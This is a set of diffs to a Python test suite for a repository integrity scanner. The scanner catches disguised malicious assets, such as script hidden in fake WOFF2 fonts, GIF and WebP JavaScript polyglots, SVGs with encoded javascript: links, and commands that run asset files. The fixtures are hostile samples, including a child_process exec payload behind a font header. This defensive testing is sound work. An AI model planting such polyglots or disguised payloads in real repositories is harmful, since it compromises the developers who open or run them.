+    def test_svg_with_harmless_entities_passes(self) -> None:
+        """Decoding must not turn ordinary escaped text into a false positive."""
+        path = self.repo / "assets" / "amp.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<title>Tools &amp; Settings &#8212; v1</title><rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
 
     def test_inert_svg_passes(self) -> None:
         path = self.repo / "assets" / "ok.svg"

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -1,0 +1,129 @@
+#!/usr/bin/env python3
+from __future__ import annotations
+
+import importlib.util
+import os
+import subprocess
+import sys
+import tempfile
+import unittest
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]
+SCRIPT = ROOT / "scripts" / "check_repository_integrity.py"
+
+spec = importlib.util.spec_from_file_location("integrity", SCRIPT)
+integrity = importlib.util.module_from_spec(spec)
+assert spec.loader is not None
+sys.modules[spec.name] = integrity
+spec.loader.exec_module(integrity)
+
+
+def git(repo: Path, *args: str) -> str:
+    result = subprocess.run(
+        ["git", *args],
+        cwd=repo,
+        check=True,
+        text=True,
+        stdout=subprocess.PIPE,
+        stderr=subprocess.PIPE,
+    )
+    return result.stdout.strip()
+
+
+class RepositoryIntegrityTest(unittest.TestCase):
+    def setUp(self) -> None:
+        self.tmp = tempfile.TemporaryDirectory()
+        self.repo = Path(self.tmp.name)
+        git(self.repo, "init", "-b", "main")
+        git(self.repo, "config", "user.name", "Test")
+        git(self.repo, "config", "user.email", "test@example.invalid")
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n", encoding="utf-8")
+        (self.repo / "lib").mkdir()
+        (self.repo / "lib" / "main.dart").write_text("void main() {}\n", encoding="utf-8")
+        git(self.repo, "add", ".")
+        git(self.repo, "commit", "-m", "base")
+        self.base = git(self.repo, "rev-parse", "HEAD")
+
+    def tearDown(self) -> None:
+        self.tmp.cleanup()
+
+    def commit(self, message: str = "change") -> str:
+        git(self.repo, "add", "-A")
+        git(self.repo, "commit", "-m", message)
+        return git(self.repo, "rev-parse", "HEAD")
+
+    def scan(self, head: str, author: str = "external") -> list:
+        old = Path.cwd()
+        os.chdir(self.repo)
+        try:
+            return integrity.scan(self.base, head, author, "TheZupZup")
+        finally:
+            os.chdir(old)
+
+    def test_clean_code_change_passes(self) -> None:
+        (self.repo / "lib" / "main.dart").write_text("void main() { print('ok'); }\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_external_vscode_change_is_blocked(self) -> None:
+        path = self.repo / ".vscode" / "tasks.json"
+        path.parent.mkdir()
+        path.write_text('{"version":"2.0.0"}\n', encoding="utf-8")
+        git(self.repo, "add", "-f", ".vscode/tasks.json")
+        git(self.repo, "commit", "-m", "workspace")
+        head = git(self.repo, "rev-parse", "HEAD")
+        findings = self.scan(head)
+        self.assertTrue(any(f.path == ".vscode/tasks.json" for f in findings))
+
+    def test_owner_can_change_maintainer_controlled_path(self) -> None:
+        path = self.repo / ".vscode" / "extensions.json"
+        path.parent.mkdir()
+        path.write_text('{"recommendations":[]}\n', encoding="utf-8")
+        git(self.repo, "add", "-f", ".vscode/extensions.json")
+        git(self.repo, "commit", "-m", "owner workspace")
+        head = git(self.repo, "rev-parse", "HEAD")
+        findings = self.scan(head, author="TheZupZup")
+        self.assertEqual(findings, [])
+
+    def test_fake_woff2_is_blocked(self) -> None:
+        path = self.repo / "public" / "fonts" / "bad.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_text("global.r=require; console.log('not a font');\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("signature does not match" in f.reason for f in findings))
+
+    def test_valid_woff2_magic_passes_signature_check(self) -> None:
+        path = self.repo / "public" / "fonts" / "ok.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_bytes(b"wOF2" + b"\0" * 64)
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_asset_execution_command_is_blocked(self) -> None:
+        path = self.repo / "docs" / "note.txt"
+        path.parent.mkdir()
+        path.write_text("node ./public/fonts/looks-safe.woff2\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("asset file as executable" in f.reason for f in findings))
+
+    def test_removing_vscode_ignore_is_blocked(self) -> None:
+        (self.repo / ".gitignore").write_text(".idea/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("`.vscode/` was removed" in f.reason for f in findings))
+
+    def test_external_symlink_is_blocked(self) -> None:
+        os.symlink("lib/main.dart", self.repo / "shortcut")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("Git symlink" in f.reason for f in findings))
+
+    def test_active_svg_is_blocked(self) -> None:
+        path = self.repo / "assets" / "bad.svg"
+        path.parent.mkdir()
+        path.write_text('<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>', encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -143,6 +143,27 @@ class RepositoryIntegrityTest(unittest.TestCase):
             )
         )
 
+    def test_external_composite_action_change_is_blocked(self) -> None:
+        """Composite actions run from the PR head in privileged workflows."""
+        path = self.repo / ".github" / "actions" / "setup-flutter" / "action.yml"
+        path.parent.mkdir(parents=True)
+        path.write_text("runs:\n  using: composite\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(
+            any(
+                f.path == ".github/actions/setup-flutter/action.yml"
+                and "maintainer-controlled" in f.reason
+                for f in findings
+            )
+        )
+
+    def test_owner_can_change_a_composite_action(self) -> None:
+        path = self.repo / ".github" / "actions" / "setup-flutter" / "action.yml"
+        path.parent.mkdir(parents=True)
+        path.write_text("runs:\n  using: composite\n", encoding="utf-8")
+        findings = self.scan(self.commit(), author="TheZupZup")
+        self.assertEqual(findings, [])
+
     def test_removing_vscode_ignore_is_blocked(self) -> None:
         (self.repo / ".gitignore").write_text(".idea/\n", encoding="utf-8")
         findings = self.scan(self.commit())

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -1,0 +1,659 @@
+#!/usr/bin/env python3
+from __future__ import annotations
+
+import importlib.util
+import os
+import subprocess
+import sys
+import tempfile
+import unittest
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[2]
+SCRIPT = ROOT / "scripts" / "check_repository_integrity.py"
+
+spec = importlib.util.spec_from_file_location("integrity", SCRIPT)
+integrity = importlib.util.module_from_spec(spec)
+assert spec.loader is not None
+sys.modules[spec.name] = integrity
+spec.loader.exec_module(integrity)
+
+SELF_TEST_PATH = "test/tooling/check_repository_integrity_test.py"
+
+# A real attack string, kept literal so the tests below exercise the production
+# pattern rather than a sanitised stand-in. The trailing marker is what keeps
+# the repository-wide scan of this very file from flagging it; the string
+# written into a fixture repository carries no marker, so it stays detectable.
+ASSET_EXECUTION_PAYLOAD = "node ./public/fonts/looks-safe.woff2\n"  # integrity-guard-fixture
+
+# Built at runtime so this source line holds neither the payload nor the marker.
+MARKED_PAYLOAD_LINE = f"{ASSET_EXECUTION_PAYLOAD.strip()}  # {integrity.FIXTURE_EXEMPTION_MARKER}"
+
+# Script body used as a disguised-asset payload. Contains no asset extension, so
+# it is inert to the text scan and needs no fixture marker of its own.
+PREFIXED_SCRIPT_PAYLOAD = b"=0;\nglobal.p=require('child_process');p.exec('id');\n"
+
+
+def asset_command(*parts: str) -> str:
+    """Assemble attack fixtures without making this source self-match."""
+    return "".join(parts)
+
+
+def gif_blob() -> bytes:
+    """A minimal but structurally complete 1x1 GIF, trailer included."""
+    header = b"GIF89a" + (1).to_bytes(2, "little") + (1).to_bytes(2, "little") + bytes([0x80, 0, 0])
+    global_color_table = b"\x00\x00\x00\xff\xff\xff"
+    descriptor = b"\x2c" + bytes(8) + b"\x00"
+    image = b"\x02" + b"\x02\x4c\x01" + b"\x00"
+    return header + global_color_table + descriptor + image + b"\x3b"
+
+
+def webp_blob() -> bytes:
+    """A minimal RIFF/WEBP container: declared length exact, real VP8 keyframe
+    start code in the payload."""
+    payload = b"\x00\x00\x00" + b"\x9d\x01\x2a" + bytes(10)
+    body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def script_webp_blob() -> bytes:
+    """Honest RIFF and chunk lengths, JavaScript in the image payload."""
+    payload = b'*/=0;console.log("EXEC")/*' + b"A" * 40 + b"*/"
+    body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def png_blob() -> bytes:
+    return b"\x89PNG\r\n\x1a\n" + (13).to_bytes(4, "big") + b"IHDR" + bytes(20)
+
+
+def pdf_blob() -> bytes:
+    """Entirely ASCII, as a standards-compliant PDF is allowed to be."""
+    return (
+        b"%PDF-1.4\n"
+        b"1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
+        b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
+        b"3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n"
+        b"xref\n0 4\n0000000000 65535 f \n"
+        b"trailer<</Size 4/Root 1 0 R>>\nstartxref\n0\n%%EOF\n"
+    )
+
+
+def ico_blob() -> bytes:
+    """One directory entry pointing at real image bytes."""
+    image = bytes(40)
+    entry = (
+        b"\x10\x10\x00\x00"
+        + (1).to_bytes(2, "little")
+        + (32).to_bytes(2, "little")
+        + len(image).to_bytes(4, "little")
+        + (22).to_bytes(4, "little")
+    )
+    return b"\x00\x00\x01\x00" + (1).to_bytes(2, "little") + entry + image
+
+
+def vp8x_only_webp_blob() -> bytes:
+    """Extended header with no image frame — well-formed, but not an image."""
+    payload = b"*/" + bytes(8) + b'console.log("EXEC")/*' + b"A" * 21 + b"*/"
+    body = b"WEBP" + b"VP8X" + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def animated_webp_blob() -> bytes:
+    """ANMF wrapping a real VP8 frame: the frame is nested, not top level."""
+    frame = b"\x00\x00\x00" + b"\x9d\x01\x2a" + bytes(10)
+    inner = b"VP8 " + len(frame).to_bytes(4, "little") + frame
+    anmf = bytes(16) + inner
+    vp8x = b"VP8X" + (10).to_bytes(4, "little") + bytes(10)
+    body = b"WEBP" + vp8x + b"ANMF" + len(anmf).to_bytes(4, "little") + anmf
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def woff2_blob(num_tables: int = 1) -> bytes:
+    """A structurally valid WOFF2 header padded out to its declared length."""
+    body = bytes(64)
+    total = 48 + len(body)
+    return (
+        b"wOF2"
+        + b"\x00\x01\x00\x00"
+        + total.to_bytes(4, "big")
+        + num_tables.to_bytes(2, "big")
+        + b"\x00\x00"
+        + bytes(32)
+        + body
+    )
+
+
+def git(repo: Path, *args: str) -> str:
+    result = subprocess.run(
+        ["git", *args],
+        cwd=repo,
+        check=True,
+        text=True,
+        stdout=subprocess.PIPE,
+        stderr=subprocess.PIPE,
+    )
+    return result.stdout.strip()
+
+
+class RepositoryIntegrityTest(unittest.TestCase):
+    def setUp(self) -> None:
+        self.tmp = tempfile.TemporaryDirectory()
+        self.repo = Path(self.tmp.name)
+        git(self.repo, "init", "-b", "main")
+        git(self.repo, "config", "user.name", "Test")
+        git(self.repo, "config", "user.email", "test@example.invalid")
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n", encoding="utf-8")
+        (self.repo / "lib").mkdir()
+        (self.repo / "lib" / "main.dart").write_text("void main() {}\n", encoding="utf-8")
+        git(self.repo, "add", ".")
+        git(self.repo, "commit", "-m", "base")
+        self.base = git(self.repo, "rev-parse", "HEAD")
+
+    def tearDown(self) -> None:
+        self.tmp.cleanup()
+
+    def commit(self, message: str = "change") -> str:
+        git(self.repo, "add", "-A")
+        git(self.repo, "commit", "-m", message)
+        return git(self.repo, "rev-parse", "HEAD")
+
+    def scan(self, head: str, author: str = "external") -> list:
+        old = Path.cwd()
+        os.chdir(self.repo)
+        try:
+            return integrity.scan(self.base, head, author, "TheZupZup")
+        finally:
+            os.chdir(old)
+
+    def test_clean_code_change_passes(self) -> None:
+        (self.repo / "lib" / "main.dart").write_text("void main() { print('ok'); }\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_external_vscode_change_is_blocked(self) -> None:
+        path = self.repo / ".vscode" / "tasks.json"
+        path.parent.mkdir()
+        path.write_text('{"version":"2.0.0"}\n', encoding="utf-8")
+        git(self.repo, "add", "-f", ".vscode/tasks.json")
+        git(self.repo, "commit", "-m", "workspace")
+        head = git(self.repo, "rev-parse", "HEAD")
+        findings = self.scan(head)
+        self.assertTrue(any(f.path == ".vscode/tasks.json" for f in findings))
+
+    def test_case_variant_ide_paths_are_blocked(self) -> None:
+        for relative in (".VSCODE/tasks.json", ".Idea/workspace.xml"):
+            with self.subTest(relative):
+                path = self.repo / relative
+                path.parent.mkdir()
+                path.write_text("{}\n", encoding="utf-8")
+                findings = self.scan(self.commit(relative))
+                self.assertTrue(any(f.path == relative for f in findings))
+                self.base = git(self.repo, "rev-parse", "HEAD")
+
+    def test_similarly_named_ide_path_is_allowed(self) -> None:
+        path = self.repo / ".vscode-notes" / "readme.txt"
+        path.parent.mkdir()
+        path.write_text("notes\n", encoding="utf-8")
+        self.assertEqual(self.scan(self.commit()), [])
+
+    def test_owner_can_change_maintainer_controlled_path(self) -> None:
+        path = self.repo / ".vscode" / "extensions.json"
+        path.parent.mkdir()
+        path.write_text('{"recommendations":[]}\n', encoding="utf-8")
+        git(self.repo, "add", "-f", ".vscode/extensions.json")
+        git(self.repo, "commit", "-m", "owner workspace")
+        head = git(self.repo, "rev-parse", "HEAD")
+        findings = self.scan(head, author="TheZupZup")
+        self.assertEqual(findings, [])
+
+    def test_fake_woff2_is_blocked(self) -> None:
+        path = self.repo / "public" / "fonts" / "bad.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_text("global.r=require; console.log('not a font');\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any(f.path.endswith("bad.woff2") for f in findings))
+
+    def test_valid_woff2_passes_structural_check(self) -> None:
+        path = self.repo / "public" / "fonts" / "ok.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_bytes(woff2_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_woff2_magic_prefix_alone_is_not_enough(self) -> None:
+        """A valid `wOF2` prefix in front of script is the incident's attack."""
+        path = self.repo / "public" / "fonts" / "sneaky.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_bytes(b"wOF2" + PREFIXED_SCRIPT_PAYLOAD)
+        findings = self.scan(self.commit())
+        self.assertTrue(any(f.path.endswith("sneaky.woff2") for f in findings))
+
+    def test_script_appended_to_a_real_font_is_blocked(self) -> None:
+        path = self.repo / "public" / "fonts" / "trailer.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_bytes(woff2_blob() + PREFIXED_SCRIPT_PAYLOAD)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("not a valid WOFF2" in f.reason for f in findings))
+
+    def test_png_signature_without_ihdr_is_blocked(self) -> None:
+        path = self.repo / "assets" / "bad.png"
+        path.parent.mkdir()
+        path.write_bytes(b"\x89PNG\r\n\x1a\n" + PREFIXED_SCRIPT_PAYLOAD)
+        findings = self.scan(self.commit())
+        self.assertTrue(any(f.path.endswith("bad.png") for f in findings))
+
+    def test_valid_gif_and_webp_pass(self) -> None:
+        (self.repo / "assets").mkdir()
+        (self.repo / "assets" / "ok.gif").write_bytes(gif_blob())
+        (self.repo / "assets" / "ok.webp").write_bytes(webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_webp_with_honest_lengths_but_script_payload_is_blocked(self) -> None:
+        """Self-consistent chunk lengths are not proof of an image."""
+        path = self.repo / "assets" / "sizes.webp"
+        path.parent.mkdir()
+        path.write_bytes(script_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertTrue(any("sizes.webp" in f.path for f in findings))
+
+    def test_vp8x_without_an_image_frame_is_blocked(self) -> None:
+        """VP8X is the extended header, not image data."""
+        path = self.repo / "assets" / "hdr.webp"
+        path.parent.mkdir()
+        path.write_bytes(vp8x_only_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertTrue(any("hdr.webp" in f.path for f in findings))
+
+    def test_animated_webp_with_nested_frame_passes(self) -> None:
+        """A real animation carries its frame inside ANMF, not at top level."""
+        path = self.repo / "assets" / "anim.webp"
+        path.parent.mkdir()
+        path.write_bytes(animated_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_ico_with_empty_directory_entry_is_blocked(self) -> None:
+        path = self.repo / "assets" / "hollow.ico"
+        path.parent.mkdir()
+        path.write_bytes(b"\x00\x00\x01\x00\x01\x00" + bytes(16))
+        findings = self.scan(self.commit())
+        self.assertTrue(any("hollow.ico" in f.path for f in findings))
+
+    def test_valid_pdf_and_ico_pass(self) -> None:
+        (self.repo / "docs").mkdir()
+        (self.repo / "docs" / "ok.pdf").write_bytes(pdf_blob())
+        (self.repo / "docs" / "ok.ico").write_bytes(ico_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_ascii_only_pdf_is_not_flagged_as_text(self) -> None:
+        """A valid PDF may contain no binary at all; the backstop must not fire."""
+        path = self.repo / "docs" / "ascii.pdf"
+        path.parent.mkdir()
+        blob = pdf_blob()
+        self.assertNotIn(b"\x00", blob, "fixture must be genuinely ASCII-only")
+        path.write_bytes(blob)
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_shell_script_named_pdf_is_blocked(self) -> None:
+        # A benign script body on purpose: what is under test is that the file
+        # is not a PDF, not what the script does. A real download-and-execute
+        # string here would be flagged by the PR security surface scanner, which
+        # reads this file too.
+        path = self.repo / "docs" / "payload.pdf"
+        path.parent.mkdir()
+        path.write_text("#!/bin/sh\necho hello\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("payload.pdf" in f.path for f in findings))
+
+    def test_executable_asset_is_blocked(self) -> None:
+        """The executable bit runs a payload without any invocation in text."""
+        path = self.repo / "assets" / "run.png"
+        path.parent.mkdir()
+        path.write_bytes(png_blob())
+        os.chmod(path, 0o755)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("executable bit" in f.reason for f in findings))
+
+    def test_ordinary_asset_mode_passes(self) -> None:
+        path = self.repo / "assets" / "plain.png"
+        path.parent.mkdir()
+        path.write_bytes(png_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_gif_javascript_polyglot_is_blocked(self) -> None:
+        """`GIF89a=0;` is both a plausible header and executable JavaScript."""
+        path = self.repo / "assets" / "poly.gif"
+        path.parent.mkdir()
+        path.write_bytes(b"GIF89a=0;console.log('EXEC')")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("poly.gif" in f.path for f in findings))
+
+    def test_webp_javascript_polyglot_is_blocked(self) -> None:
+        """The fourcc can be parked inside a JavaScript comment."""
+        path = self.repo / "assets" / "poly.webp"
+        path.parent.mkdir()
+        path.write_bytes(b"RIFF/*xxWEBPVP8 */=0;console.log('EXEC')")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("poly.webp" in f.path for f in findings))
+
+    def test_text_only_asset_is_blocked(self) -> None:
+        """Backstop: real assets in these formats always carry binary content."""
+        path = self.repo / "assets" / "text.png"
+        path.parent.mkdir()
+        path.write_bytes(b"just plain text pretending to be an image\n")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("entirely text" in f.reason for f in findings))
+
+    def test_truncated_webp_is_blocked(self) -> None:
+        path = self.repo / "assets" / "short.webp"
+        path.parent.mkdir()
+        path.write_bytes(b"RIFF" + (9999).to_bytes(4, "little") + b"WEBPVP8 " + bytes(32))
+        findings = self.scan(self.commit())
+        self.assertTrue(any("short.webp" in f.path for f in findings))
+
+    def test_asset_execution_command_is_blocked(self) -> None:
+        path = self.repo / "docs" / "note.txt"
+        path.parent.mkdir()
+        path.write_text(ASSET_EXECUTION_PAYLOAD, encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("asset file as executable" in f.reason for f in findings))
+
+    def test_asset_execution_payload_is_blocked_inside_the_self_test_path(self) -> None:
+        """The fixture exemption is per line, not per file."""
+        path = self.repo / SELF_TEST_PATH
+        path.parent.mkdir(parents=True)
+        path.write_text(ASSET_EXECUTION_PAYLOAD, encoding="utf-8")
+        findings = self.scan(self.commit(), author="TheZupZup")
+        self.assertTrue(
+            any(
+                f.path == SELF_TEST_PATH and "asset file as executable" in f.reason
+                for f in findings
+            )
+        )
+
+    def test_external_change_to_the_guard_self_test_is_blocked(self) -> None:
+        path = self.repo / SELF_TEST_PATH
+        path.parent.mkdir(parents=True)
+        path.write_text("import unittest\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(
+            any(
+                f.path == SELF_TEST_PATH and "maintainer-controlled" in f.reason
+                for f in findings
+            )
+        )
+
+    def test_external_composite_action_change_is_blocked(self) -> None:
+        """Composite actions run from the PR head in privileged workflows."""
+        path = self.repo / ".github" / "actions" / "setup-flutter" / "action.yml"
+        path.parent.mkdir(parents=True)
+        path.write_text("runs:\n  using: composite\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(
+            any(
+                f.path == ".github/actions/setup-flutter/action.yml"
+                and "maintainer-controlled" in f.reason
+                for f in findings
+            )
+        )
+
+    def test_owner_can_change_a_composite_action(self) -> None:
+        path = self.repo / ".github" / "actions" / "setup-flutter" / "action.yml"
+        path.parent.mkdir(parents=True)
+        path.write_text("runs:\n  using: composite\n", encoding="utf-8")
+        findings = self.scan(self.commit(), author="TheZupZup")
+        self.assertEqual(findings, [])
+
+    def test_negated_vscode_ignore_is_blocked(self) -> None:
+        """Git applies the last matching rule, so a later `!` undoes the entry."""
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!.vscode/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_glob_negation_of_a_protected_ignore_is_blocked(self) -> None:
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!.vs*\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_recursive_glob_negation_is_blocked(self) -> None:
+        """Git applies `**/` at every depth, including the repository root."""
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!**/.vscode/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_catch_all_negation_is_blocked(self) -> None:
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!*\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_negation_before_the_entry_is_harmless(self) -> None:
+        """Order matters: the positive entry comes last, so it wins."""
+        (self.repo / ".gitignore").write_text(".idea/\n!.vscode/\n.vscode/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_unrelated_negation_is_allowed(self) -> None:
+        (self.repo / ".gitignore").write_text(
+            ".idea/\n.vscode/\nbuild/\n!build/keep.txt\n", encoding="utf-8"
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_removing_vscode_ignore_is_blocked(self) -> None:
+        (self.repo / ".gitignore").write_text(".idea/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("`.vscode/` was removed" in f.reason for f in findings))
+
+    def test_external_symlink_is_blocked(self) -> None:
+        os.symlink("lib/main.dart", self.repo / "shortcut")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("Git symlink" in f.reason for f in findings))
+
+    def test_svg_animation_event_handler_is_blocked(self) -> None:
+        """Handlers outside the old five-name allowlist still execute."""
+        path = self.repo / "assets" / "anim.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg"><animate onbegin="alert(1)"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_entity_encoded_javascript_url_is_blocked(self) -> None:
+        """An XML parser resolves `java&#x73;cript:` before the link is used."""
+        path = self.repo / "assets" / "entity.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x73;cript:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_decimal_entity_encoded_javascript_url_is_blocked(self) -> None:
+        path = self.repo / "assets" / "decimal.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#115;cript:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_tab_encoded_javascript_scheme_is_blocked(self) -> None:
+        """URL parsing discards embedded tabs before resolving the scheme."""
+        path = self.repo / "assets" / "tab.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x09;script:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_newline_encoded_javascript_scheme_is_blocked(self) -> None:
+        path = self.repo / "assets" / "nl.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x0a;script:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_svg_text_node_mentioning_a_scheme_is_not_flagged(self) -> None:
+        """Prose is not a URL: the normalised pass is anchored to href."""
+        path = self.repo / "assets" / "prose.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<text>Use java&#x09;script: for this</text>'
+            '<text>java&#x0a;script:</text><rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_svg_text_split_across_lines_is_not_flagged(self) -> None:
+        """Control stripping must not join unrelated tokens into a false match."""
+        path = self.repo / "assets" / "split.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">\n'
+            '<desc>java</desc>\n<desc>script: release notes</desc>\n'
+            '<rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_svg_with_harmless_entities_passes(self) -> None:
+        """Decoding must not turn ordinary escaped text into a false positive."""
+        path = self.repo / "assets" / "amp.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<title>Tools &amp; Settings &#8212; v1</title><rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_inert_svg_passes(self) -> None:
+        path = self.repo / "assets" / "ok.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg" version="1.1">'
+            '<rect width="10" height="10" fill="#0088cc"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_active_svg_is_blocked(self) -> None:
+        path = self.repo / "assets" / "bad.svg"
+        path.parent.mkdir()
+        path.write_text('<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>', encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+
+class FixtureExemptionTest(unittest.TestCase):
+    """The narrow carve-out that lets this module hold literal attack strings."""
+
+    def test_payload_is_detected_at_an_ordinary_path(self) -> None:
+        finding = integrity.asset_execution_finding("docs/note.txt", ASSET_EXECUTION_PAYLOAD)
+        self.assertIsNotNone(finding)
+
+    def test_shell_source_commands_for_assets_are_detected(self) -> None:
+        for command in (
+            asset_command("source assets/payload.", "png"),
+            asset_command(". assets/payload.", "woff2"),
+        ):
+            with self.subTest(command):
+                self.assertIsNotNone(
+                    integrity.asset_execution_finding("docs/note.txt", command)
+                )
+
+    def test_dot_used_as_an_argument_is_not_asset_execution(self) -> None:
+        self.assertIsNone(
+            integrity.asset_execution_finding(
+                "docs/note.txt", asset_command("jq . assets/data.", "png")
+            )
+        )
+
+        self.assertIsNone(
+            integrity.asset_execution_finding(
+                "docs/note.txt", asset_command("source config.", "env")
+            )
+        )
+
+    def test_numeric_chmod_that_grants_execute_is_detected(self) -> None:
+        for mode in ("755", "775", "700", "0755", "0711"):
+            with self.subTest(mode):
+                command = asset_command("chmod ", mode, " assets/payload.", "png")
+                self.assertIsNotNone(
+                    integrity.asset_execution_finding("docs/note.txt", command)
+                )
+
